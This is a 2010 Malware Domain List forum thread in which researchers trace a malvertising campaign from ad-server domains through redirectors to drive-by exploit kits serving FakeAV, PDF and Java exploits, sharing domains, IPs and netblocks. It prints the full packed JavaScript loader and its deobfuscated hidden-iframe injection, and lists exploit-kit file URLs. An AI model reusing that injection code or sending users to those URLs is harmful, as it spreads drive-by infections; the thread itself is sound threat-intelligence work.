Malware Domain List

Malware Related => Malicious Domains => Topic started by: eoin.miller on May 11, 2010, 05:00:59 pm

Title: adnet.media.*.com domains - NEW TITLE
Post by: eoin.miller on May 11, 2010, 05:00:59 pm
Drive by sites serving up FakeAV and exploiting clients through PDF and Java vulnerabilities.

Virus total is only picking up 7/41 on the FakeAV currently.
http://www.virustotal.com/analisis/01b398a0ffe71f4d284df532f7d6112c6d4ca40d8ade4d358ba772f1352fc8ff-1273594077

PDF:
http://relwqin.com/b/pdf/all.pdf

Java:
http://relwqin.com/b/java/gsb2.jar
http://relwqin.com/b/java/bof.jar

Driveby URL:
http://relwqin.com/b/index.php?m=jp
Title: Re: 194.8.250.60 - polkita.com, relwqin.com
Post by: eoin.miller on May 11, 2010, 05:06:19 pm
Entry points to drive by's:

http://alenadi.com/cust.php?n=cust2
http://canteeve.com/cust.php?n=cust2

Almost all the people we have going to these sites are clicking on links from people going to Microsoft live.com mail accounts and other sites using malvertising services like those on live.com.
Title: Re: 194.8.250.60 - polkita.com, relwqin.com
Post by: eoin.miller on May 12, 2010, 02:06:29 pm
More today:

http://qwebork.com/a/index.php
http://lutypla.com/a/index.php
http://trynger.com/a/index.php

Looks like it is rotating domains daily (not surprising) and the IP is staying the same for now. Still getting linked to by legit sites that have done business with advertising services that do not provide proper vetting of organizations they choose to do business with it appears.
Title: Re: 194.8.250.60 - polkita.com, relwqin.com
Post by: eoin.miller on May 12, 2010, 03:54:00 pm
New entry point:

aledat.com
Title: Re: 194.8.250.60 - polkita.com, relwqin.com
Post by: philipp on May 12, 2010, 04:13:20 pm
Code: [Select]
403 http://trynger.com/
200 http://trynger.com/b/
200 http://trynger.com/a/
200 http://trynger.com/e/
200 http://trynger.com/d/
200 http://trynger.com/c/
403 http://trynger.com/cgi-bin/
302 http://trynger.com/config/
200 http://trynger.com/b/index.php
200 http://trynger.com/b/install.php
403 http://trynger.com/b/d/
403 http://trynger.com/b/bin/
403 http://trynger.com/b/include/
403 http://trynger.com/b/java/
403 http://trynger.com/b/pdf/
200 http://trynger.com/b/d/0.php (MD5: eb2add15ac24545e28cbc87dac1a7e65)
200 http://trynger.com/b/d/1.php (MD5: eb2add15ac24545e28cbc87dac1a7e65)
200 http://trynger.com/b/d/2.php (MD5: eb2add15ac24545e28cbc87dac1a7e65)
200 http://trynger.com/b/d/3.php (MD5: eb2add15ac24545e28cbc87dac1a7e65)
200 http://trynger.com/b/d/4.php (MD5: eb2add15ac24545e28cbc87dac1a7e65)
200 http://trynger.com/b/d/5.php (MD5: eb2add15ac24545e28cbc87dac1a7e65)
200 http://trynger.com/b/bin/upload.php
200 http://trynger.com/b/include/config.php
200 http://trynger.com/b/java/bof.jar
200 http://trynger.com/b/java/gsb2.jar
200 http://trynger.com/b/pdf/all.pdf
200 http://trynger.com/b/pdf/pdf.php
200 http://trynger.com/a/index.php
200 http://trynger.com/a/install.php
403 http://trynger.com/a/d/
403 http://trynger.com/a/bin/
403 http://trynger.com/a/include/
403 http://trynger.com/a/java/
403 http://trynger.com/a/pdf/
200 http://trynger.com/a/d/0.php
200 http://trynger.com/a/d/1.php
200 http://trynger.com/a/d/2.php
200 http://trynger.com/a/d/3.php
200 http://trynger.com/a/d/4.php
200 http://trynger.com/a/d/5.php
200 http://trynger.com/a/bin/upload.php
200 http://trynger.com/a/include/config.php
200 http://trynger.com/a/java/bof.jar
200 http://trynger.com/a/java/gsb2.jar
200 http://trynger.com/a/pdf/all.pdf
200 http://trynger.com/a/pdf/pdf.php
200 http://trynger.com/e/index.php
200 http://trynger.com/e/install.php
403 http://trynger.com/e/d/
403 http://trynger.com/e/bin/
403 http://trynger.com/e/include/
403 http://trynger.com/e/java/
403 http://trynger.com/e/pdf/
200 http://trynger.com/e/d/0.php (MD5: d8fc0cbb07ab263198d7a5fbb0ee5c53)
200 http://trynger.com/e/d/1.php (MD5: d8fc0cbb07ab263198d7a5fbb0ee5c53)
200 http://trynger.com/e/d/2.php (MD5: d8fc0cbb07ab263198d7a5fbb0ee5c53)
200 http://trynger.com/e/d/4.php (MD5: d8fc0cbb07ab263198d7a5fbb0ee5c53)
200 http://trynger.com/e/d/5.php (MD5: d8fc0cbb07ab263198d7a5fbb0ee5c53)
200 http://trynger.com/e/d/3.php (MD5: d8fc0cbb07ab263198d7a5fbb0ee5c53)
200 http://trynger.com/e/bin/upload.php
200 http://trynger.com/e/include/config.php
200 http://trynger.com/e/java/bof.jar
200 http://trynger.com/e/java/gsb2.jar
200 http://trynger.com/e/pdf/all.pdf
200 http://trynger.com/e/pdf/pdf.php
200 http://trynger.com/d/index.php
200 http://trynger.com/d/install.php
403 http://trynger.com/d/d/
403 http://trynger.com/d/bin/
403 http://trynger.com/d/include/
403 http://trynger.com/d/java/
403 http://trynger.com/d/pdf/
200 http://trynger.com/d/d/0.php
200 http://trynger.com/d/d/1.php
200 http://trynger.com/d/d/2.php
200 http://trynger.com/d/d/4.php
200 http://trynger.com/d/d/5.php
200 http://trynger.com/d/d/3.php
200 http://trynger.com/d/bin/upload.php
200 http://trynger.com/d/include/config.php
200 http://trynger.com/d/java/bof.jar
200 http://trynger.com/d/java/gsb2.jar
200 http://trynger.com/d/pdf/all.pdf
200 http://trynger.com/d/pdf/pdf.php
200 http://trynger.com/c/index.php
200 http://trynger.com/c/install.php
403 http://trynger.com/c/d/
403 http://trynger.com/c/bin/
403 http://trynger.com/c/include/
403 http://trynger.com/c/java/
403 http://trynger.com/c/pdf/
200 http://trynger.com/c/d/0.php
200 http://trynger.com/c/d/1.php
200 http://trynger.com/c/d/3.php
200 http://trynger.com/c/d/2.php
200 http://trynger.com/c/d/4.php
200 http://trynger.com/c/d/5.php
200 http://trynger.com/c/bin/upload.php
200 http://trynger.com/c/include/config.php
200 http://trynger.com/c/java/bof.jar
200 http://trynger.com/c/java/gsb2.jar
200 http://trynger.com/c/pdf/all.pdf
200 http://trynger.com/c/pdf/pdf.php
Code: [Select]
200 http://aledat.com/
200 http://aledat.com/cust.php
200 http://aledat.com/index.php
200 http://aledat.com/phpinfo.php
403 http://aledat.com/b/
403 http://aledat.com/w/
403 http://aledat.com/ad/
403 http://aledat.com/cgi-bin/
403 http://aledat.com/ad/js/

edit: forgot the other one :D
Title: Re: 194.8.250.60 - polkita.com, relwqin.com
Post by: eoin.miller on May 12, 2010, 06:02:26 pm
Found the advertising server that is redirecting to the intermediary and eventually the exploit sites:

adnet.media.roxantb.com

That domain was registered last month and serves up packed/obfuscated javascript:

Code: [Select]
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('5 3M={5f:q(m,e,n){m=12.3F(m);5 R=[],M=\'\';x(5 i=0;i<m.j;i+=3){5 11=\'1\';x(5 h=0;h<3;h++){v(i+h<m.j){N=8.o(m.f(i+h))-30;v(N.j<2)N=\'0\'+N}3K 5a;11+=N}R.2t(11+\'1\')}x(5 k=0;k<R.j;k++){5 P=8.13(R[k],e,n);5 L=P.X(16);V(L.j<7)L=\'0\'+L;M+=L}M=M.3R(3P 3O(\'^+|+$\',\'g\'),\'\');b 8.2r(M)},3N:q(c,d,n){c=8.2p(c);5 G=[],U=\'\',18=\'\';x(5 i=0;i<c.j;i+=7)G.2t(c.Y(i,7));x(5 u=0;u<G.j;u++)v(G[u]==\'\')G.5b(u,1);x(5 u=0;u<G.j;u++){5 P=8.13(Z(G[u],16),d,n)+\'\';U+=P.Y(1,P.j-2)}x(5 u=0;u<U.j;u+=2)18+=8.a(Z(U.Y(u,2),10)+30);b 12.3Q(18)},o:q(a){b t.o(a)},a:q(2u){b t.a(2u)},17:q(g,l){b g-(l*58.59(g/l))},13:q(2s,14,19){5 W=1,i=0,O=2s;V((14>>i)>0){v(((14>>i)&1)==1)W=8.17((W*O),19);O=8.17((O*O),19);i++}b W},2r:q(B){b B;5 J=\'\';x(5 i=0,Q=B.j;i<Q;i+=2){5 I=Z(\'\'+B.f(i)+B.f(i+1),16).X(10);J+=t.a(I)}b J},2p:q(B){b B;5 J=\'\';x(5 i=0,Q=B.j;i<Q;i++){5 I=t.o(B.f(i)).X(16);J+=I.j==2?I:\'0\'+I}b J}};5 t={F:{3J:{2v:2q,2B:2w,2z:2A,2y:2x,2n:2o,2e:2d,2b:2c,2a:29,2g:2f,2m:2l,2j:2k,2i:2h,2D:2C,2Y:2X,28:2W,2U:2T,31:2Z,35:36,32:34,2S:33,2I:2R,2H:2J,2E:2G,2K:2F,2Q:2L,2O:2P,2N:2M,1M:37,1r:1p,1t:1u,1q:1x,1w:1v,1C:1B,1z:1A,1y:1o,1m:1D,1f:1d,1a:1c,1e:1b,1l:1n,1k:1g,1h:1j,1s:1i,1Y:27,1X:1Z,1U:1W,20:1V,26:21,24:25,1E:22,1T:23,1J:1S,1I:1K,1F:1H,1L:1G,1Q:1R,1N:1P,2V:1O,4v:3c,38:4r,4u:4t,4p:4s,4w:4q,4A:4B,4y:4z,4n:4o,4e:4d,4b:4c,4a:49,4g:4f,4m:4l,4D:4k,4h:4j,4C:4i,4Y:4H,4X:4Z,4U:4W,51:4V,52:55,53:56,50:54,4I:4S,4T:4J,4E:4G,4K:4F,4Q:4L,4P:4R,4M:4O,4x:4N,3t:47,3s:3u,3p:3r,3v:3q,3B:3w,3z:3A,3y:3x,3n:3o,3e:3d,3b:48,3a:39,3g:3f,3m:3l,3j:3k,3i:3h,3D:3C,3Z:3Y,3W:3X,3V:3U,41:40,45:46,42:44,3T:43,3I:3S},3H:{2q:2v,2w:2B,2A:2z,2x:2y,2o:2n,2d:2e,2c:2b,29:2a,2f:2g,2l:2m,2k:2j,2h:2i,2C:2D,2X:2Y,2W:28,2T:2U,2Z:31,36:35,34:32,33:2S,2R:2I,2J:2H,2G:2E,2F:2K,2L:2Q,2P:2O,2M:2N,37:1M,1p:1r,1u:1t,1x:1q,1v:1w,1B:1C,1A:1z,1o:1y,1D:1m,1d:1f,1c:1a,1b:1e,1n:1l,1g:1k,1j:1h,1i:1s,27:1Y,1Z:1X,1W:1U,1V:20,21:26,25:24,22:1E,23:1T,1S:1J,1K:1I,1H:1F,1G:1L,1R:1Q,1P:1N,1O:2V,3c:4v,4r:38,4t:4u,4s:4p,4q:4w,4B:4A,4z:4y,4o:4n,4d:4e,4c:4b,49:4a,4f:4g,4l:4m,4k:4D,4j:4h,4i:4C,4H:4Y,4Z:4X,4W:4U,4V:51,55:52,56:53,54:50,4S:4I,4J:4T,4G:4E,4F:4K,4L:4Q,4R:4P,4O:4M,4N:4x,47:3t,3u:3s,3r:3p,3q:3v,3w:3B,3A:3z,3x:3y,3o:3n,3d:3e,48:3b,39:3a,3f:3g,3l:3m,3k:3j,3h:3i,3C:3D,3Y:3Z,3X:3W,3U:3V,40:41,46:45,44:42,43:3T,3S:3I}},o:q(a,r){r=r||\'3J\';v(!8.F[r])b 3G;a=a.5g(0);b(a 3E 8.F[r])?8.F[r][a]:a},a:q(o,r){r=r||\'3H\';v(!8.F[r])b 3G;o=(o 3E 8.F[r])?8.F[r][o]:o;b 5m.5h(o)}};5 12={w:"5l+/=",3F:q(p){5 s=\'\',H,C,D,K,E,z,y,i=0;V(i<p.j){H=t.o(p.f(i++));C=t.o(p.f(i++));D=t.o(p.f(i++));K=H>>2;E=((H&3)<<4)|(C>>4);z=((C&15)<<2)|(D>>6);y=D&5i;v(3L(C))z=y=S;3K v(3L(D))y=S;s=s+8.w.f(K)+8.w.f(E)+8.w.f(z)+8.w.f(y)}b s},3Q:q(p){5 s=\'\',H,C,D,K,E,z,y,i=0;p=p.3R(3P 3O(\'[^A-5j-5e-9+/=]\',\'g\'),\'\');V(i<p.j){K=8.w.T(p.f(i++));E=8.w.T(p.f(i++));z=8.w.T(p.f(i++));y=8.w.T(p.f(i++));H=(K<<2)|(E>>4);C=((E&15)<<4)|(z>>2);D=((z&3)<<6)|y;s=s+t.a(H);v(z!=S)s=s+t.a(C);v(y!=S)s=s+t.a(D)}b s}};5d(3M.3N(\'57\',\'5c\',\'5k\'));',62,333,'|||||var|||this||chr|return||||charAt||||length|||||ord|input|function|dir|output|ASCII||if|alphabet|for|enc4|enc3||str|chr2|chr3|enc2|translations|decryptarray|chr1|bte|result|enc1|chunk|coded|tmpstr|basepow2|resultmod|len|asci|64|indexOf|deencrypt|while|accum|toString|substr|parseInt||tmpasci|BASE64|powmod|exp|||mod|resultd|modulus|1028|175|170|168|1031|1025|179|1169|184|180|1110|1030|1168|178|163|156|1115|1114|1105|1116|157|159|1119|158|1032|1118|162|161|1038|165|1040|1044|197|196|1043|1042|195|1045|8250|1047|200|199|1046|198|194|1041|1112|189|188|1108|8470|186|1029|190|192|193|1111|191|1109|185|1035|135|8225|8224|134|133|8230|136|8364|139|8249|1033|138|137|8240|8222|132|strhex|128|hexstr|base|push|num|1026|129|131|1107|8218|130|1027|140|1034|8211|151|150|8226|8221|149|8212|152|154|1113|8482|153|65533|148|8220|143|1039|1048|142|141|1036|144||1106|8217|147|146|8216|145|155|1050|242|1090|1089|201|240|1088|243|1091|246|1094|1093|245|244|1092|1087|239|1082|235|234|1081|1080|233|1083|236|238|1086|1085|237|1084|247|1095|in|encode|null|php2js|1103|js2php|else|isNaN|RSA|decrypt|RegExp|new|decode|replace|255|1102|250|1098|1097|249|248|1096|251|1099|1101|254|253|1100|252|232|241|211|1059|1058|210|209|1057|212|1060|1063|216|215|214|213|1061|1056|208|1052|205|202|204|203|1051|1049|1053|1079|1055|207|1054|206|1064|1062|1074|227|226|217|1072|225|1075|228|1078|231|230|1077|1076|229|224|1073|1067|220|219|1066|1065|218|1071|1068|1069|1070|223|221|222|1e0207526271ff2eedf4423bec450e06a6f1f528ac28ea9c4050c2d003cbab303400fe28ea9c4050c2d003cbab303400fe2dae2430da709233f18d90dfbafc242d8ab1ce7d6e385b92c28d9dcc260d92b2f9c03c18bc4a128d9dcc260d92b0964bf818bc4a1167111c271c61c2dbd91d03809de2e0b7cd39764932dbd91d03809de2e0b7cd39764932dbd91d03809de2e0b7cd353c74638daa560bbc7450439e830637fdc07a4226081064f1a81a3a041041025346a428663c1125e31404104102b7f48428663c106d7b240d03df82daa6a33958fb72e063be15334d81a5f1ca38ad0051dc1d2515d364525644f5320b3f2125e31410161ec050c2d003cbab303400fe28ea9c4050c2d003cbab303400fe2dae2430da709233f18d90dfbafc242d8ab1ce7d6e385b92c28d9dcc260d92b2f9c03c18bc4a128d9dcc260d92b0964bf818bc4a1362a6bc19de87c1678dc41a844d71e9390b0cec8741fb659b08f567703cd1f415334d80c8047520b93d527e6ea61936fa60ae650f0730a9f167111c31fa20d0592c0220f6b3030dfff80edc77008c468b3208b7106d8142234f47406d6e04034948b2da7f6024f82a038588d62dc5030115424a0532e9d23bfc961757fb00b29df70a160b62ee078d247a6730b29df731d765039c4d912b4ec5b11b9dc623ef17438588d60297027241f38f10ab52527898691655b231eb65f715461bd29b668622be1d2074ae1011412280f73d7d2b49a3a11070d52dbe78c05a3ac43233df42f9a9ff07547a5148f29700897fa3032d8c274e65a3977c7304140921d15cde165a317285260f30eac2618af9ed2b5b76738db07f216ab7a13836572d9e39f00e4ce81ff08df043c95a2f1021805cb82e0dd8ba3381c41313c32cf1c1cbbe15ca10c0be411b0faec0009c222e08d6bf30c8d81a233f12724e8ae21128b9d14a49f815461bd30849002c04c3f036c44b193f8d01542b392c6bb5c021099f1c8a3fe0a480c70b2189106ff0b11c9ab7f173b8bb26700e401d1f9e171b134087cabc22a9b812854a9535c7dc72f9f68425e0d392e8f91b3836d0f21d915a067e04e1057eea073afcf10810671ca2ccd2dbe8560dcf5f617804470b679950fa04fa28d0bd3296c29930746f535a751111ce64728001ce1d7ac4a283623e0522faa39d77db058275b16aa6ed34e43590c1b15a2119788193c20a274e65a3977c7304140921d15cde165a317285260f30eac2618af9ed2b5b76738db07f216ab7a13836572d9e39f00e4ce81ff08df043c95a2f1021805cb82e0dd8ba3381c41313c32cf2dbf1501bb943b316f25238e312b0dd21811a037b5399384d3294b8a36da9b62cb6fc1392303d0cda4430a605f00e5e84322e4e23316b13012d4bfa0f22aac013e4d91a0efac25b58782c4047801d16b5121ce8a30660b71263fe915b9df1009dca82badb6924531452dcbe66145c41d07c1b28043431e382c01a2b416f42ff2347187b04a1d56b4333a22b53893393269aa271dd73b20d457861ebef29262c1330b80af7003f04d184586c0e4931d03400fe2e46aaf20aa7542a03011171ac1e35fd8b32ff23471b9dad832f6d501286e8e352dc9f0da8e94318d7b00cc6a6805a4a8918869d90c4c46c16bcaaf2f14b3e29d353420063ff1dddce30c50ff82654d24316da3000a3eac105373a208e740122df942e088031195c680175b9d27593bf2a67f1831ff59d26a48d107f41ac0b052c519f0aae1d81ab519085a705426ca1857780362f28322268012dc7c7919c0f7029460321cf70b71d5dbd7355d91929460322706ca73835f5618eb1962545dfe2fa283c372e3fb1610872174eef327148c315ad7120ce58701b9dad832f6d500995ef901f626d2939e0e082f1b1267704e15710252713bc524d2dd614593b414fbe990bb34a6015f07d0fffcec1b1a148215b373298545e0206bc820bf59c31ef6ca37b300814349323795d8c336fcd11f2dcd328d0bd314d2eb03813ce001e0cd01be68b90e3af110b2d8cd316da30021427b37bc5351d7ac4a0dde4c303e297435999cf34cfa0e0b10ba4346d54f0da70920ea16690ca99ae086c7401e2c8990abb2f10952f3f0006bb0160c00c1ac67b42010e990b0879726b75a6385db6921dc6122ae56512719841386ebf2109caaa2eedf4435d99f109440781fc1e7237a1ecc08176460661abe011bcc01d7561f1c27b2438971a338b9e162c37b1800df36c07260ed03c38dc25b15a41ff09700fbebfb2f952c31f92b83184062b084071f244f8a81ab739a26cc15c0342f2a111200009c9b5801f626d2939e0e082f1b1267704e18ca28f|Math|floor|break|splice|3451759|eval|z0|encrypt|charCodeAt|fromCharCode|63|Za|60670333|ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789|String'.split('|'),0,{}))
Deobfuscated:
Code: [Select]
<iframe src="http://aledat.com/cust.php?n=cust2" style="visibility: hidden;" height="1" width="1"></iframe>
<iframe class=" izvpldobgmpcxynswtnf" src="http://adnet.media.roxantb.com/stats_js_e.php?id=22214735" style="visibility: hidden;" height="1" width="1"></iframe>
<a href="http://curves.com/?=34547" target="_blank">
<img class=" izvpldobgmpcxynswtnf" src="http://adnet.media.roxantb.com/banners/load.php?id=22214735" border="0"></a>

In this instance, the aledat.com/cust.php?n=cust2 request redirects to another site that actually has the driveby kit on it.
Title: Re: 194.8.250.60 - polkita.com, relwqin.com
Post by: SysAdMini on May 12, 2010, 06:06:57 pm
What exactly is the url of obfuscated code ?
Title: Re: 194.8.250.60 - polkita.com, relwqin.com
Post by: eoin.miller on May 12, 2010, 06:23:01 pm
There is also another domain name on this IP, I should be able to churn up some more domains now.

adnet.media.plebert.com

Title: Re: 194.8.250.60 - polkita.com, relwqin.com
Post by: eoin.miller on May 12, 2010, 06:29:13 pm
What exactly is the url of obfuscated code ?

here is an example one:

http://adnet.media.roxantb.com/bn/j/cd/?rq=104192&sid=22214735&m=514&tn=7&d=s&ct=1&t=s
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: eoin.miller on May 12, 2010, 07:07:53 pm
Malvertising hostnames:
adnet.media.roxantb.com
adnet.media.plebert.com
adnet.media.ditent.com
adnet.media.modicea.com

IP addresses:
188.72.192.52
188.72.192.67
188.72.192.221
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: eoin.miller on May 12, 2010, 08:03:36 pm
Sooooo, yea, there is tons of badness going on in here. Basically, all traffic to the 188.72.192.0/24 should be considered suspect.

Hostnames within the 188.72.192.0/24 we have seen traffic to/from in the last month or so:
ad.doubleclick.net.spellet.com
adfarm.mediaplex.com.rulash.com
adnet.media.ditent.com
adnet.media.modicea.com
adnet.media.plebert.com
adnet.media.roxantb.com
aledat.com
alenadi.com
canteeve.com
media.fastclick.net.attesca.com
mediastatsfx.com
sefito.com
stathyte.com
view.atdmt.com.dilann.com
view.atdmt.com.intati.com
www.downloads.ws - [i]Probably[/i] not a malware site...

Looks like they enjoy keeping the real domain names of advertising servers as a prefix to their own.
Title: Re: 194.8.250.60 - polkita.com, relwqin.com
Post by: Kimberly on May 13, 2010, 02:50:51 am
Almost all the people we have going to these sites are clicking on links from people going to Microsoft live.com mail accounts and other sites using malvertising services like those on live.com.
Hi do you have more information about that? Does it happen on blogs, hotmail ... ? If it comes through MS advertising I can get those pulled but I need more information where the redirects occur if possible.

Quote
Looks like they enjoy keeping the real domain names of advertising servers as a prefix to their own.
Yes, that's going on for a while already.
Title: Re: 194.8.250.60 - polkita.com, relwqin.com
Post by: eoin.miller on May 13, 2010, 04:10:54 pm
Almost all the people we have going to these sites are clicking on links from people going to Microsoft live.com mail accounts and other sites using malvertising services like those on live.com.
Hi do you have more information about that? Does it happen on blogs, hotmail ... ? If it comes through MS advertising I can get those pulled but I need more information where the redirects occur if possible.

Most of the time it is when people login to the live.com mail account, the banner ad has the packed/obfuscated javascript that is served up by one of the following domains:

ad.doubleclick.net.spellet.com
adfarm.mediaplex.com.rulash.com
adnet.media.ditent.com
adnet.media.modicea.com
adnet.media.plebert.com
adnet.media.roxantb.com
media.fastclick.net.attesca.com
view.atdmt.com.dilann.com
view.atdmt.com.intati.com

Then that JavaScript from the above list of sites includes an iframe that loads content from the following domains:
aledat.com/?cust=2
alenadi.com/?cust=2
canteeve.com/?cust=2
sefito.com/?cust=2
stathyte.com/?cust=2

Then the content loaded from those sites causes the actual drive by's to be loaded from the following sites which all resolve to 194.8.250.60/194.8.250.61:

polkita.com
www.lutypla.com
zarenaga.com
turkinke.com
relwqin.com
trynger.com
qwebork.com

Quote
Looks like they enjoy keeping the real domain names of advertising servers as a prefix to their own.
Yes, that's going on for a while already.
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: eoin.miller on May 13, 2010, 04:59:00 pm
Forgot to add that anything within the 194.8.250.0/24 should also be considered suspect.

194.8.250.0/24 - Hosts the drive by's, exploits and malware.
188.72.192.0/24 - Hosts the Malicious advertising services redirecting to the drive by, exploit and malware.
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: eoin.miller on May 14, 2010, 02:41:06 pm
Domains we have seen using these advertising services, primarily the most referrers have been mail.live.com servers once users have logged in to check their mail.

Code: [Select]
ad.doubleclick.net
adnet.media.ditent.com
ad.yieldmanager.com
anet.tradedoubler.com
apps.detnews.com
b5.boards2go.com
beforeitsnews.com
blogs.citizen-times.com
blogs.desmoinesregister.com
bobshouseofvideogames.com
caloriecount.about.com
classifieds.gftribune.com
comics.com
courier-journal.weather.gannettonline.com
cvhs.adbureau.net
dailyfreeman.ca.kaango.com
dailylocal.com
dailysquee.com
data.tennessean.com
delcotimes.com
detnews.com
forums.televisionwithoutpity.com
googleads.g.doubleclick.net
hawaiipreps.honoluluadvertiser.com
hfboards.com
ihasahotdog.com
lumberjocks.com
macombdaily.com
mainlinemedianews.com
mediatakeout.com
middletownpress.com
moneycentral.msn.com
movies.msn.com
msn.foxsports.com
mylifeisaverage.com
nashvillecitypaper.com
nbcsports.msnbc.com
nhregister.com
obituaries.citizen-times.com
ouinsider.com
oxygen.com
photos.indystar.com
php.app.com
pioneer.olivesoftware.com
pqasb.pqarchiver.com
pubads.g.doubleclick.net
ratemyprofessors.com
saratogian.com
sec.todaysthv.com
svc1.m5prod.net
tag.admeld.com
thedailywh.at
the.honoluluadvertiser.com
topix.cachefly.net
trentonian.com
troyrecord.com
tv.msn.com
webmail.peoplepc.com
www.13wmaz.com
www.49erswebzone.com
www.9news.com
www.apartments.com
www.app.com
www.argusleader.com
www.azcentral.com
www.barnesandnoble.com
www.baxterbulletin.com
www.bigeasyclassifieds.com
www.calgarysun.com
www.captivate.com
www.cars.com
www.casttv.com
www.charter.net
www.chillicothegazette.com
www.citizen-times.com
www.clarionledger.com
www.cnweekly.com
www.coshoctontribune.com
www.courier-journal.com
www.courierpostonline.com
www.crimsonconfidential.com
www.dailyfreeman.com
www.dailylocal.com
www.dailyrecord.com
www.dailyworld.com
www.darkroastedblend.com
www.delawareonline.com
www.delcotimes.com
www.delmarvanow.com
www.democratandchronicle.com
www.desmoinesregister.com
www.excite.com
www.federaltimes.com
www.fishexplorer.com
www.floridatoday.com
www.fox5vegas.com
www.freep.com
www.greatfallstribune.com
www.greenandwhite.com
www.greenbaypressgazette.com
www.guampdn.com
www.hawaiinavynews.com
www.heritage.com
www.heritagenews.com
www.honoluluadvertiser.com
www.huffingtonpost.com
www.india-forums.com
www.lansingstatejournal.com
www.legacy.com
www.lohud.com
www.macombdaily.com
www.mainlinemedianews.com
www.mentalfloss.com
www.middletownpress.com
www.montgomeryadvertiser.com
www.morningjournal.com
www.mycentraljersey.com
www.nashuatelegraph.com
www.neogaf.com
www.news-herald.com
www.newsleader.com
www.news-press.com
www.nextdaypets.com
www.nhregister.com
www.oneidadispatch.com
www.overclockersclub.com
www.portclintonnewsherald.com
www.pottsmerc.com
www.pottstownmercury.com
www.press-citizen.com
www.pressconnects.com
www.prosportsdaily.com
www.racingjunk.com
www.rawstory.com
www.registercitizen.com
www.rgj.com
www.saratogian.com
www.speedwaymedia.com
www.stevenspointjournal.com
www.tallahassee.com
www.televisionwithoutpity.com
www.tennessean.com
www.tetongravity.com
www.theadvertiser.com
www.thecalifornian.com
www.theithacajournal.com
www.themorningsun.com
www.thenewsstar.com
www.thereporteronline.com
www.thespectrum.com
www.thetimesherald.com
www.timesherald.com
www.tmnews.com
www.tomshardware.com
www.trentonian.com
www.troyrecord.com
www.universalsports.com
www.usanetwork.com
www.visaliatimesdelta.com
www.wausaudailyherald.com
www.wbir.com
www.wisconsinrapidstribune.com
www.worldtimeserver.com
www.wtsp.com
www.wusa9.com
www.zanesvilletimesrecorder.com
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: eoin.miller on May 14, 2010, 10:32:17 pm
This has been tossed over to US-CERT, dsheild/SANS and MS. Hopefully these guys can get rooted out of the affiliate networks quickly.
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: SysAdMini on May 14, 2010, 11:30:33 pm
Someone sent us this url by contact form.

Code: [Select]
http://adnet.media.unwited.com/cr/j/cd/?rt=47210&sid=2421828&m=5171&ts=31&d=x&ctc=31&tm=sc
url format looks exactly like the one from adnet.media.roxantb.com. I don't see any redirection to malwareurl.
Obfuscated code contains a link to bestwestern.com.
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: SysAdMini on May 14, 2010, 11:44:01 pm
also reported today

Code: [Select]
adnet.media.prananc.com/b/jx/cd/?rq=103193&sid=215411720&m=714&tn=4&d=s&ct=1&t=s
adnet.media.ditent.com/bn/j/cd/?rq=104192&sid=9472394&m=514&tn=7&d=s&ct=1&t=s
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: eoin.miller on May 17, 2010, 04:38:19 pm
Someone sent us this url by contact form.

Code: [Select]
http://adnet.media.unwited.com/cr/j/cd/?rt=47210&sid=2421828&m=5171&ts=31&d=x&ctc=31&tm=sc
url format looks exactly like the one from adnet.media.roxantb.com. I don't see any redirection to malwareurl.
Obfuscated code contains a link to bestwestern.com.

Domain is definately malicious and actively being seen on our network. I've seen it not include the malicious URL's sometimes, not sure why really. Obfuscated javascript leads client to the following exploit kit URL's in order in the sample we have looked at:

http://phicruss.com/cust.php?n=cust2
http://bbnhs.com/c/index.php

JS Unpack Report for URL http://adnet.media.unwited.com/cr/j/cd/?rt=47210&sid=2421828&m=5171&ts=31&d=x&ctc=31&tm=sc:
http://jsunpack.jeek.org/dec/go?report=b39fc1948d85cbd5b96bee1ee078ea2b432bbe59

They flipped to the 178.162.133.0/24 netblock on 5-14-10 @15:00 UTC. Luckily this is only for the advertising server hosting the javascript that is redirecting. The domains still being served up currently go to the other previously mentioned netblocks (188.72.192.0/24, 194.8.250.0/24). Most advertising now seems to be referred by Yahoo! web mail services. hooray.
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: Kimberly on May 18, 2010, 06:24:37 am
This has been tossed over to US-CERT, dsheild/SANS and MS. Hopefully these guys can get rooted out of the affiliate networks quickly.
Correction: US-CERT & SANS and Dshield. MS still has nothing and they are the only ones who can do something about it.

Quote
Most advertising now seems to be referred by Yahoo! web mail services. hooray
Yeah, so what about those victims? Got any PCAP's of going through Yahoo as I have contacts in every advertising network and that way faster than SANS (it's not even their business).

Imagine how many more people have been infected because you send stuff to the wrong people ?
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: eoin.miller on May 18, 2010, 03:12:27 pm
This has been tossed over to US-CERT, dsheild/SANS and MS. Hopefully these guys can get rooted out of the affiliate networks quickly.
Correction: US-CERT & SANS and Dshield. MS still has nothing and they are the only ones who can do something about it.

Quote
Most advertising now seems to be referred by Yahoo! web mail services. hooray
Yeah, so what about those victims? Got any PCAP's of going through Yahoo as I have contacts in every advertising network and that way faster than SANS (it's not even their business).

Imagine how many more people have been infected because you send stuff to the wrong people ?

The handlers at these various organizations told me they are disseminating the information appropriately to the correct places. If you wish to furnish me with direct contacts at any of these organizations, I will talk to them directly about it and provide any information I have to help stop it. I do not send out PCAP's of my clients data to unknown sources via web forums, even after I have taken the time to sanitize them. This isn't my first rodeo.

And FYI, SANS is part of the co-op that is DShield.

http://www.dshield.org/
http://isc.sans.org/

Look similiar?
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: eoin.miller on May 24, 2010, 06:35:43 pm
FYI, this is still running pretty rampant, watching people get referred from sites like open.ad.yieldmanager.net:



Quote
